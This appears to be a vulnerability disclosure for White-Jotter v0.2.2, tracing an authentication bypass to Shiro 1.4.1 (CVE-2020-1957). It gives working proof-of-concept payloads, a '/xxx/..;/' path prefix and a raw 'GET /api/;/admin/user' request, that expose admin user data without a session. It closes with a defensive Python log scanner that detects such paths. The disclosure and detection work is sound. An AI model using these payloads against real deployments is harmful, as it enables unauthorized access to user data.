White-Jotter v0.2.2 has an authorization bypass vulnerability that allows unauthorized users to access sensitive system information and even modify critical system data. This vulnerability compromises the confidentiality and integrity of the system.
Code Auditing
The project uses Shiro 1.4.1 for access control.
According to CVE-2020-1957, in Apache Shiro before 1.5.2, when Apache Shiro is used with Spring dynamic controllers, a specially crafted request may cause an authentication bypass. Therefore, the project is vulnerable to authentication bypass.
Proof of Concept
1. Visit the URL http://x.x.x.x:8443/api/admin/user to get user information. Without a cookie, it responds with no data. The request and response are as follows.
2. Add “/xxx/..;/” at the beginning of the request path, i.e. the new URL is http://x.x.x.x:8443/xxx/..;/api/admin/user. Even without a cookie, it responds with user information, so the authentication is bypassed.
![image](https://github.com/user-attachments/assets/7bd77111-4e9c-4202-9253-672b8ca5a6c4)
3. The following request is another payload that bypasses the authentication.
```http
GET /api/;/admin/user HTTP/1.1
Host: x.x.x.x:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Origin: http://x.x.x.x:8080
Connection: keep-alive
Referer: http://x.x.x.x:8080/
```
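For operators who want to spot these requests in access logs, the following Python snippet is an added example (not part of the original report or of the White-Jotter project). It canonicalizes a raw request path the way a servlet container does (drop `;` path parameters from each segment, resolve `..`, collapse duplicate slashes) and flags requests whose raw path does not fall under a protected prefix but whose canonical path does, which is exactly the mismatch both payloads above rely on. The protected prefix and the log lines are constructed for the example.

```python
import re
from posixpath import normpath

# Constructed: the admin API prefix that the Shiro filter chain is meant to protect.
PROTECTED_PREFIXES = ("/api/admin/",)

def canonicalize(raw_path: str) -> str:
    """Approximate servlet-container path resolution: strip ';param' from
    every segment, then collapse '.', '..' and duplicate slashes."""
    path = raw_path.split("?", 1)[0]
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    canon = normpath("/".join(segments))
    return "/" + canon.lstrip("/")  # normpath may keep a leading '//'

def is_bypass_attempt(raw_path: str) -> bool:
    """True when the raw path (what a naive prefix check sees) looks outside
    the protected area but the canonical path lands inside it."""
    raw_protected = raw_path.startswith(PROTECTED_PREFIXES)
    canon_protected = canonicalize(raw_path).startswith(PROTECTED_PREFIXES)
    return canon_protected and not raw_protected

# Constructed access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /api/admin/user HTTP/1.1" 401 0
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /xxx/..;/api/admin/user HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /api/;/admin/user HTTP/1.1" 200 812
10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /api/article HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def find_bypass_attempts(log_text: str) -> list[str]:
    """Return the raw request paths of log lines that look like bypass attempts."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and is_bypass_attempt(m.group("path")):
            hits.append(m.group("path"))
    return hits

if __name__ == "__main__":
    for p in find_bypass_attempts(SAMPLE_LOG):
        print("possible Shiro path bypass:", p, "->", canonicalize(p))
```

A hit means the path the access-control filter matched and the path the controller actually served diverged; on an unpatched Shiro the durable fix is upgrading to 1.5.2 or later, and this check only helps find attempts in historical logs.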